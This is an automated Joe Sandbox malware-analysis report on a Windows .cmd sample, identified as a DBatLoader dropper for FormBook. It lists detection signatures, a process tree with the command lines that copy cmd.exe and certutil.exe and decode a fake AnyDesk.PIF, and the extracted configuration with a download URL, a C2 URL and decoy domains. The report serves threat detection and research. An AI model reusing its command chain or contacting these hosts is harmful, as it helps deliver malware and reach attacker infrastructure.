Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
A1 igazol#U00e1s.cmd

Overview

General Information

Sample name:A1 igazol#U00e1s.cmd
renamed because original name is a hash value
Original sample name:A1 igazols.cmd
Analysis ID:1563771
MD5:ebdec3ea8aada5aae98146f1b61a13ed
SHA1:9ed537ca66a14b296010eccdde716b1b1a629fe2
SHA256:6650a769ac035e23964c16c27df892d7725f415dee92582a4c7b4ceeef7345b2
Tags:cmdHUNuser-smica83
Infos:

Detection

DBatLoader, FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected FormBook
AI detected suspicious sample
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates a thread in another existing process (thread injection)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Registers a new ROOT certificate
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Child Processes Of SndVol.exe
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7808 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 7896 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7916 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 7936 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7956 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7972 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 8012 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 8040 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • AnyDesk.PIF (PID: 8064 cmdline: C:\Users\Public\Libraries\AnyDesk.PIF MD5: A8AF2D572217E48EEEBDF7DD135F90CD)
      • cmd.exe (PID: 7280 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aoikokpI.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • esentutl.exe (PID: 7460 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • SndVol.exe (PID: 7528 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
        • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
          • msdt.exe (PID: 4040 cmdline: "C:\Windows\SysWOW64\msdt.exe" MD5: BAA4458E429E7C906560FE4541ADFCFB)
            • cmd.exe (PID: 2288 cmdline: /c del "C:\Windows\SysWOW64\SndVol.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 4152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • alpha.exe (PID: 8080 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 8100 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://aquadream.rs/244_Ipkokioahlp"]}

Threatname: FormBook

{"C2 list": ["www.atingdilse.site/d05n/"], "decoy": ["cdrama.site", "ise142.xyz", "ynthia-mcc-lin-tick.link", "askabirokulmumkun.online", "tpdayakslot888.top", "adikoyescortatings.xyz", "ybzert.online", "ujdd.shop", "90yhj301.top", "2xiezhen.net", "uickerandeasier.store", "ode.xyz", "9838.xyz", "gsbet.net", "ustavoglins.store", "evelupcasino.club", "826mza.top", "eanliving.site", "87crxy301.top", "amzlo.shop", "rmt.xyz", "cductcleaning102.fun", "hechefsexperience.info", "joops.music", "ultangaziescortbayanlari.online", "arot-chat.online", "dipisci-harum.site", "kd00.top", "caffolding-17822.bond", "wdes83904.vip", "nilink.education", "egos.design", "nline-advertising-95315.bond", "ental-implants-50062.bond", "apaescortatings.xyz", "r-outsourcing-69869.bond", "card.boats", "affodilconsignment.shop", "rafting-minecraft.link", "ittycozy.shop", "itchen-appliances-55012.bond", "rnuah.xyz", "h8gq8vzm9j.buzz", "espasaigon.online", "ursing-caregiver-jobs-za-3.bond", "yzsports200.xyz", "enies.top", "zziof2.xyz", "estspacefox.shop", "buod.info", "ichetgouttiere.link", "egakids.shop", "xc31.top", "ebsiteclients.online", "trl-migrate.online", "uantumgrovedesignstudio.online", "ajagacor777bar.art", "ynapticshiftai.tech", "irdewagacor89.lat", "amlouis.music", "aim79.online", "upta.bio", "druei.info", "utobahncollision.shop"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18819:$sqlite3step: 68 34 1C 7B E1
      • 0x1892c:$sqlite3step: 68 34 1C 7B E1
      • 0x18848:$sqlite3text: 68 38 2A 90 C5
      • 0x1896d:$sqlite3text: 68 38 2A 90 C5
      • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 44 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      17.2.SndVol.exe.4990000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        17.2.SndVol.exe.4990000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          17.2.SndVol.exe.4990000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          17.2.SndVol.exe.4990000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bafa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          17.2.SndVol.exe.4990000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a19:$sqlite3step: 68 34 1C 7B E1
          • 0x17b2c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a48:$sqlite3text: 68 38 2A 90 C5
          • 0x17b6d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 16 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
          Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 8064, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
          Sigma detected: Execution from Suspicious Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7808, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7916, ProcessName: alpha.exe
          Sigma detected: Parent in Public Folder Suspicious Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 7916, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7936, ProcessName: extrac32.exe
          Sigma detected: Suspicious Program Location with Network Connections
          Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 185.102.77.43, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\AnyDesk.PIF, Initiated: true, ProcessId: 8064, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49705
          Sigma detected: Execution of Suspicious File Type Extension
          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\AnyDesk.PIF, NewProcessName: C:\Users\Public\Libraries\AnyDesk.PIF, OriginalFileName: C:\Users\Public\Libraries\AnyDesk.PIF, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7808, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 8064, ProcessName: AnyDesk.PIF
          Sigma detected: Uncommon Child Processes Of SndVol.exe
          Source: Process startedAuthor: X__Junior (Nextron Systems): Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: C:\Windows\System32\SndVol.exe, ParentImage: C:\Windows\SysWOW64\SndVol.exe, ParentProcessId: 7528, ParentProcessName: SndVol.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 4084, ProcessName: explorer.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T13:22:15.857386+010020283713Unknown Traffic192.168.2.849706185.102.77.43443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.atingdilse.site/d05n/"], "decoy": ["cdrama.site", "ise142.xyz", "ynthia-mcc-lin-tick.link", "askabirokulmumkun.online", "tpdayakslot888.top", "adikoyescortatings.xyz", "ybzert.online", "ujdd.shop", "90yhj301.top", "2xiezhen.net", "uickerandeasier.store", "ode.xyz", "9838.xyz", "gsbet.net", "ustavoglins.store", "evelupcasino.club", "826mza.top", "eanliving.site", "87crxy301.top", "amzlo.shop", "rmt.xyz", "cductcleaning102.fun", "hechefsexperience.info", "joops.music", "ultangaziescortbayanlari.online", "arot-chat.online", "dipisci-harum.site", "kd00.top", "caffolding-17822.bond", "wdes83904.vip", "nilink.education", "egos.design", "nline-advertising-95315.bond", "ental-implants-50062.bond", "apaescortatings.xyz", "r-outsourcing-69869.bond", "card.boats", "affodilconsignment.shop", "rafting-minecraft.link", "ittycozy.shop", "itchen-appliances-55012.bond", "rnuah.xyz", "h8gq8vzm9j.buzz", "espasaigon.online", "ursing-caregiver-jobs-za-3.bond", "yzsports200.xyz", "enies.top", "zziof2.xyz", "estspacefox.shop", "buod.info", "ichetgouttiere.link", "egakids.shop", "xc31.top", "ebsiteclients.online", "trl-migrate.online", "uantumgrovedesignstudio.online", "ajagacor777bar.art", "ynapticshiftai.tech", "irdewagacor89.lat", "amlouis.music", "aim79.online", "upta.bio", "druei.info", "utobahncollision.shop"]}
          Source: 10.0.AnyDesk.PIF.400000.0.unpackMalware Configuration Extractor: DBatLoader {"Download Url": ["https://aquadream.rs/244_Ipkokioahlp"]}
          Multi AV Scanner detection for submitted file
          Source: A1 igazol#U00e1s.cmdReversingLabs: Detection: 15%
          Yara detected FormBook
          Source: Yara matchFile source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
          Machine Learning detection for dropped file
          Source: C:\Users\Public\Libraries\AnyDesk.PIFJoe Sandbox ML: detected
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685422F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF685422F38
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685422C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,7_2_00007FF685422C2C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685484694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,7_2_00007FF685484694
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685446694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,7_2_00007FF685446694
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6654 NCryptGetProperty,#360,7_2_00007FF6854E6654
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547A654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,7_2_00007FF68547A654
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A2724 CryptDecodeObject,GetLastError,#357,7_2_00007FF6854A2724
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854526E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,7_2_00007FF6854526E0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E66D8 NCryptFreeObject,#360,7_2_00007FF6854E66D8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D86D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,7_2_00007FF6854D86D8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854EA590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF6854EA590
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854AE57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,7_2_00007FF6854AE57C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B65B4 NCryptIsKeyHandle,_CxxThrowException,7_2_00007FF6854B65B4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68551A58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,7_2_00007FF68551A58C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685438600 #357,CryptDecodeObject,GetLastError,LocalFree,7_2_00007FF685438600
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685440630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF685440630
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543C5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,7_2_00007FF68543C5D4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854725E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,7_2_00007FF6854725E8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68551E8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,7_2_00007FF68551E8B0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0844 BCryptExportKey,#205,#359,#357,#357,7_2_00007FF6854B0844
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E4914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6854E4914
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549E914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,7_2_00007FF68549E914
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68542A8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,7_2_00007FF68542A8CC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B08EC BCryptGetProperty,#205,#359,#357,#357,7_2_00007FF6854B08EC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B07A4 BCryptDestroyHash,#205,#357,7_2_00007FF6854B07A4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0740 BCryptCloseAlgorithmProvider,#205,#357,#357,7_2_00007FF6854B0740
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854EA740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6854EA740
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E8814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,7_2_00007FF6854E8814
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685436824 CryptHashCertificate,GetLastError,#357,7_2_00007FF685436824
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C07D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF6854C07D0
